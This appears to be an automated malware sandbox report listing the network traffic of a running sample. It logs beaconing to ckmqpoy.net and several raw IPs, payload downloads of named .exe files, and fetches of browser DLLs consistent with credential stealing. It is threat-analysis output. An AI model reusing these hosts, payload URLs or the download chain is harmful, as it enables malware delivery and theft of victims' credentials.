                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1Host: ckmqpoy.netUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                              Source: unknownTCP traffic detected without corresponding DNS query: 41.216.188.190
                              Source: unknownTCP traffic detected without corresponding DNS query: 41.216.188.190
                              Source: unknownTCP traffic detected without corresponding DNS query: 41.216.188.190
                              Source: unknownTCP traffic detected without corresponding DNS query: 41.216.188.190
                              Source: unknownTCP traffic detected without corresponding DNS query: 41.216.188.190
                              Source: unknownTCP traffic detected without corresponding DNS query: 41.216.188.190
                              Source: unknownTCP traffic detected without corresponding DNS query: 41.216.188.190
                              Source: unknownTCP traffic detected without corresponding DNS query: 41.216.188.190
                              Source: unknownTCP traffic detected without corresponding DNS query: 41.216.188.190
                              Source: unknownTCP traffic detected without corresponding DNS query: 41.216.188.190
                              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                              Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.33
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                              Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                              Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.33
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.33
                              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                              Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                              Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.111.174.109
                              Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                              Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                              Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                              Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                              Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                              Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                              Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                              Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                              Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
                              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                              Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                              Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.33
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0050CA00 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_0050CA00
                              Source: global trafficHTTP traffic detected: GET /?format=json HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: api64.ipify.org
                              Source: global trafficHTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: ipinfo.io
                              Source: global trafficHTTP traffic detected: GET /kcatelin/jameson/downloads/easyfirewall.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: bitbucket.orgCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /vsfdhgg15.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: nerv.com.peCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /vfsdgdf.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: nerv.com.peCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /bbfbfb0f-4597-4ff3-b025-124f61baf271/downloads/7f30c6a5-e68f-46b2-82dc-be29f7fa498f/easyfirewall.exe?response-content-disposition=attachment%3B%20filename%3D%22easyfirewall.exe%22&AWSAccessKeyId=ASIA6KOSE3BNALNDSNXI&Signature=7Oy%2Bjzmz%2FlXC%2FL1QASQlZvKc%2Bl8%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEFUaCXVzLWVhc3QtMSJGMEQCIDE7ySbs3yUKutqnoMVZe2lBMy%2FzLUXK7oA9sVz3qh3fAiB7uhzCaJ9QAf8KACE%2BI3nJiDzFAW0ja%2FG7sHqOwjkBVyqwAgiO%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMsG28MyjVkhRoivDZKoQC2Nc%2FjnX7Tbhrr0Gh8ipoFpgeJ%2BpNqndZT4i%2BOmSK6LFExTbeLlFeC3aOopynxOWTtXGkMfcvWjgryJmsRfTly0%2F%2F3B3Vx63gKJ4o3QZZExWB5ecbpWMs%2Bc48sEJ8nIrd4YZibjmyiqvqkjxZkJTMVKCLLCM7ZO2hRDaB22a7lR1E7CpB7AAoyh%2FiTlDsxWuHKuDLvqMqx8UNPVEvpzj3sV2M4kl9sn7TBWI5yWl%2FZymPomH2fXbA6yTcmqlPq%2FrDycduU0I01uI8v91zRz7QDYqWlTquKfBYFo%2FoWPY7toSWKATL7%2FwXiHqODNH93aSs63LBq39Xw41mTOonKYbRosm22PQwjf66twY6ngHaj1zb%2FhGT4dlAnMdSXHAGlvyvWd50O5Ui%2FXnBPKGu108w8WdcK%2BdyQpVVrnszsaYmewsJVta0GbBLEkWzuG6hpH2CVZ%2FFLyb67eupBy2hlY65kjfqM4In7bmglhQvyp8rQxvkvy0gnGZmosr%2FkSQ9CPGtgk4LksgvH44YQAs89ZIepAI4tRgHG8daweiznls0oHyfxP5H2e2ydTKV3g%3D%3D&Expires=1726924309 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Cache-Control: no-cacheHost: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /sdhsfd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: nerv.com.peCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: iplogger.org
                              Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Connection: Keep-AliveCache-Control: no-cacheHost: cowod.hopto.org
                              Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 116.203.165.127Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /api/wp-ping.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 41.216.188.190
                              Source: global trafficHTTP traffic detected: GET /Files/1.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /kurwa HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.111.174.109Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /thebig/noode.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.113.115.33Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /prog/66e705d09b33c_jack.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /yuop/66ee79315857f_setup33333.exe#lyla HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
